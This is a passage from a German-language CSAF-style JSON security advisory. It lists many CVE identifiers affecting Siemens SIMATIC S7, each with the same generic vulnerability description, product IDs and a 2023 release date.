manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-20572" }, { "cve": "CVE-2022-20566", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-20566" }, { "cve": "CVE-2022-20422", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-20422" }, { "cve": "CVE-2022-20421", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-20421" }, { "cve": "CVE-2022-1882", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-1882" }, { "cve": "CVE-2022-1852", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-1852" }, { "cve": "CVE-2022-1679", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-1679" }, { "cve": "CVE-2022-1473", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-1473" }, { "cve": "CVE-2022-1462", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-1462" }, { "cve": "CVE-2022-1434", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-1434" }, { "cve": "CVE-2022-1343", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-1343" }, { "cve": "CVE-2022-1292", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-1292" }, { "cve": "CVE-2022-1184", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-1184" }, { "cve": "CVE-2022-1012", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-1012" }, { "cve": "CVE-2022-0171", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-0171" }, { "cve": "CVE-2021-42386", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-42386" }, { "cve": "CVE-2021-42385", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-42385" }, { "cve": "CVE-2021-42384", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-42384" }, { "cve": "CVE-2021-42383", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-42383" }, { "cve": "CVE-2021-42382", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-42382" }, { "cve": "CVE-2021-42381", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-42381" }, { "cve": "CVE-2021-42380", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-42380" }, { "cve": "CVE-2021-42379", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-42379" }, { "cve": "CVE-2021-42378", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-42378" }, { "cve": "CVE-2021-42377", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-42377" }, { "cve": "CVE-2021-42376", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-42376" }, { "cve": "CVE-2021-42375", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-42375" }, { "cve": "CVE-2021-42374", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-42374" }, { "cve": "CVE-2021-42373", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-42373" }, { "cve": "CVE-2021-4037", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-4037" }, { "cve": "CVE-2021-3999", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-3999" }, { "cve": "CVE-2021-3998", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-3998" }, { "cve": "CVE-2021-38604", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-38604" }, { "cve": "CVE-2021-3759", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-3759" }, { "cve": "CVE-2021-35942", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-35942" }, { "cve": "CVE-2021-33655", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-33655" }, { "cve": "CVE-2021-33574", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese 